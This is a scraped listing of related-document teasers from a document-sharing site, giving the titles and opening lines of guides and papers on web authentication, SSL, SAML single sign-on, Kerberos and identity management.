What is Web Authentication? Web Authentication Application Note Web authentication is a Layer 3 security feature that causes the router to not allow IP traffic (except DHCP-related packets) from a particular
More informationSecuring your Online Data Transfer with SSL A GUIDE TO UNDERSTANDING SSL CERTIFICATES, how they operate and their application INDEX 1. Overview 2. What is SSL? 3. How to tell if a Website is Secure 4.
More informationSingle Sign On for ShareFile with NetScaler. Deployment Guide
Single Sign On for ShareFile with NetScaler Deployment Guide This deployment guide focuses on defining the process for enabling Single Sign On into Citrix ShareFile with Citrix NetScaler. Table of Contents
More informationResearch and Implementation of Single Sign-On Mechanism for ASP Pattern *
Research and Implementation of Single Sign-On Mechanism for ASP Pattern * Bo Li, Sheng Ge, Tian-yu Wo, and Dian-fu Ma Computer Institute, BeiHang University, PO Box 9-32 Beijing 100083 Abstract Software
More informationConfiguring ADFS 3.0 to Communicate with WhosOnLocation SAML
Configuring ADFS 3.0 to Communicate with WhosOnLocation SAML --------------------------------------------------------------------------------------------------------------------------- Contents Overview...
More informationIntroduction to SAML. Jason Rouault Section Architect Internet Security Solutions Lab Hewlett-Packard. An XML based Security Assertion Markup Language
Introduction to SAML An XML based Security Assertion Markup Language Jason Rouault Section Architect Internet Security Solutions Lab Hewlett-Packard 1/18/2002 Introduction to SAML Page 1 Credits and Acknowledgements
More informationMONDESIR Eunice WEILL-TESSIER Pierre FEDERATED IDENTITY. ASR 2006/2007 Final Project. Supervisers: Maryline Maknavicius-Laurent, Guy Bernard
MONDESIR Eunice WEILL-TESSIER Pierre FEDERATED IDENTITY ASR 2006/2007 Final Project Supervisers: Maryline Maknavicius-Laurent, Guy Bernard Federated Identity Project topic Superviser: Maryline Maknavicius
More informationDesign and Implementaion of a Single Sign-On Library Supporting SAML (Security Assertion Markup Language) for Grid and Web Services Security
Design and Implementaion of a Single Sign-On Library Supporting SAML (Security Assertion Markup Language) for Grid and Web Services Security Dongkyoo Shin, Jongil Jeong, and Dongil Shin Department of Computer
More informationIMPLEMENTING SINGLE SIGN- ON USING SAML 2.0 ON JUNIPER NETWORKS MAG SERIES JUNOS PULSE GATEWAYS
APPLICATION NOTE IMPLEMENTING SINGLE SIGN- ON USING SAML 2.0 ON JUNIPER NETWORKS MAG SERIES JUNOS PULSE GATEWAYS SAML 2.0 combines encryption and digital signature verification across resources for a more
More informationLeveraging SAML for Federated Single Sign-on:
Leveraging SAML for Federated Single Sign-on: Seamless Integration with Web-based Applications whether cloudbased, private, on-premise, or behind a firewall Single Sign-on Layer v.3.2-006 PistolStar, Inc.
More informationOnly LDAP-synchronized users can access SAML SSO-enabled web applications. Local end users and applications users cannot access them.
This chapter provides information about the Security Assertion Markup Language (SAML) Single Sign-On feature, which allows administrative users to access certain Cisco Unified Communications Manager and
More informationSAP NetWeaver AS Java
Chapter 75 Configuring SAP NetWeaver AS Java SAP NetWeaver Application Server ("AS") Java (Stack) is one of the two installation options of SAP NetWeaver AS. The other option is the ABAP Stack, which is
More informationHow To Use Saml 2.0 Single Sign On With Qualysguard
QualysGuard SAML 2.0 Single Sign-On Technical Brief Introduction Qualys provides its customer the option to use SAML 2.0 Single Sign On (SSO) authentication with their QualysGuard subscription. When implemented,
More informationBlackBerry Internet Service Using the Browser on Your BlackBerry Smartphone Version: 2.8
BlackBerry Internet Service Using the Browser on Your BlackBerry Smartphone Version: 2.8 User Guide SWDT653811-793266-0827104650-001 Contents Getting started... 3 About messaging service plans for BlackBerry
More informationAgenda. How to configure
dlaw@esri.com Agenda Strongly Recommend: Knowledge of ArcGIS Server and Portal for ArcGIS Security in the context of ArcGIS Server/Portal for ArcGIS Access Authentication Authorization: securing web services
More informationMicrosoft Office 365 Using SAML Integration Guide
Microsoft Office 365 Using SAML Integration Guide Revision A Copyright 2013 SafeNet, Inc. All rights reserved. All attempts have been made to make the information in this document complete and accurate.
More informationThree attacks in SSL protocol and their solutions
Three attacks in SSL protocol and their solutions Hong lei Zhang Department of Computer Science The University of Auckland zhon003@ec.auckland.ac.nz Abstract Secure Socket Layer (SSL) and Transport Layer
More informationOverview of CSS SSL. SSL Cryptography Overview CHAPTER
CHAPTER 1 Secure Sockets Layer (SSL) is an application-level protocol that provides encryption technology for the Internet, ensuring secure transactions such as the transmission of credit card numbers
More informationNetwork Identity. 1. Introduction. Kai Kang Helsinki University of Technology Networking Laboratory kkang@cc.hut.fi
Network Identity Kai Kang Helsinki University of Technology Networking Laboratory kkang@cc.hut.fi Abstract: This paper is concerning on modern Network Identity issues, emphasizing on network identity management,
More informationIdentity Management. Critical Systems Laboratory
Identity Management Critical Systems What is Identity Management? Identity: a set of attributes and values, which might or might not be unique Storing and manipulating identities Binding virtual identities
More informationEnd User Guide The guide for email/ftp account owner
End User Guide The guide for email/ftp account owner ServerDirector Version 3.7 Table Of Contents Introduction...1 Logging In...1 Logging Out...3 Installing SSL License...3 System Requirements...4 Navigating...4
More informationGT 6.0 GSI C Security: Key Concepts
GT 6.0 GSI C Security: Key Concepts GT 6.0 GSI C Security: Key Concepts Overview GSI uses public key cryptography (also known as asymmetric cryptography) as the basis for its functionality. Many of the
More informationUsing Foundstone CookieDigger to Analyze Web Session Management
Using Foundstone CookieDigger to Analyze Web Session Management Foundstone Professional Services May 2005 Web Session Management Managing web sessions has become a critical component of secure coding techniques.
More informationSingle Sign-On Secure Authentication Password Mechanism
Single Sign-On Secure Authentication Password Mechanism Deepali M. Devkate, N.D.Kale ME Student, Department of CE, PVPIT, Bavdhan, SavitribaiPhule University Pune, Maharashtra,India. Assistant Professor,
More informationPARTNER INTEGRATION GUIDE. Edition 1.0
PARTNER INTEGRATION GUIDE Edition 1.0 Last Revised December 11, 2014 Overview This document provides standards and guidance for USAA partners when considering integration with USAA. It is an overview of
More informationHosted Microsoft Exchange Client Setup & Guide Book
Hosted Microsoft Exchange Client Setup & Guide Book Section 1 Microsoft Outlook Web Access (OWA) access directions Section 2 Windows 10 Mail App setup & configuration Section 3 Windows Mobile Phone ActiveSync
More informationPassword Power 8 Plug-In for Lotus Domino Single Sign-On via Kerberos
Password Power 8 Plug-In for Lotus Domino Single Sign-On via Kerberos PistolStar, Inc. PO Box 1226 Amherst, NH 03031 USA Phone: 603.547.1200 Fax: 603.546.2309 E-mail: salesteam@pistolstar.com Website:
More informationWEB SECURITY. Oriana Kondakciu 0054118 Software Engineering 4C03 Project
WEB SECURITY Oriana Kondakciu 0054118 Software Engineering 4C03 Project The Internet is a collection of networks, in which the web servers construct autonomous systems. The data routing infrastructure
More informationTwo SSO Architectures with a Single Set of Credentials
Two SSO Architectures with a Single Set of Credentials Abstract Single sign-on (SSO) is a widely used mechanism that uses a single action of authentication and authority to permit an authorized user to
More informationSCAS: AN IMPROVED SINGLE SIGN-ON MODEL BASE ON CAS
SCAS: AN IMPROVED SINGLE SIGN-ON MODEL BASE ON CAS 1,2 XIANG LIYUN, 1 FANG ZHIYI, 1 SUN HONGYU 1 College of Computer Science and Technology, Jilin University, Changchun, China 2 Department of Computer
More informationSingle Sign-on (SSO) technologies for the Domino Web Server
Single Sign-on (SSO) technologies for the Domino Web Server Jane Marcus December 7, 2011 2011 IBM Corporation Welcome Participant Passcode: 4297643 2011 IBM Corporation 2 Agenda USA Toll Free (866) 803-2145
More information